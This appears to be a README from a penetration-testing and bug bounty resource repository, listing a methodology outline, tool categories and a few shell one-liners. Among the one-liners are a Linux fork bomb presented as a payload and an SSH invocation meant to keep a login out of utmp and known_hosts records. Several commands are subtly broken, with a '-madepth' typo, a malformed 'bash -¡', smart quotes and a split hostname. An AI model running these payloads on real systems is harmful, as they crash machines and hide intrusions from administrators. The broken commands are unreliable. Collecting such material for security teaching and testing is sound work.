Bug Bounty Methodology

1. Scope, Ethics, Code of Conduct, etc.

2. Reconnaissance and Information Gathering

4. Authentication and Authorization Attacks

RootDown Pentest & Bug Bounty

Helpful Oneliners

One-Lin3r one-liner tool for privilege escalation and more

Recon

#List all nmap scripts
ls /usr/share/nmap/scripts | sed ‘s/\.nse$//‘ | sort

Payloads

#”Linux Fork Bomb” - Create processes until the system “crashes”
:(){ :|: & };:

#”Almost Invisible SSH” - This will not add your user to the /var/log/utmp file and you won’t show up in w or who command of logged in users. It will bypass profile and bash profile as well. On your client side it will stop logging the host name to ~/.ssh/known_hosts.*  Credit: netmux 
ssh -o UserKnownHostsFile=/dev/null -T user@example. com “bash -¡” 

C2 & PostOP

#Delete empty files
alias rm0=“find . -madepth 1 -size 0 -delete -print”

[!IMPORTANT] Material in this repository is intended purely for informational and educational purposes. Don't crime.

• Tools • Browse a collection of tools curated for specific tasks from recon to post-op.

• Scripts • Suite of scripts to: Automate monitoring, secure servers, find vulns & escalate privileges.

• Resources • Quick reference lists for OSINT, mobile & web and hardware hacking. Methodology in the works.

• Hardware • Hak5 & O.MG devices. Other gadgets coming soon (Catsniffer, Magspoof…)

P.S.: Huge thanks to every author of these sources. Feel free to contribute or suggest improvements! We believe in the power of community and collaboration. Every single contribution, however small, is valued and appreciated.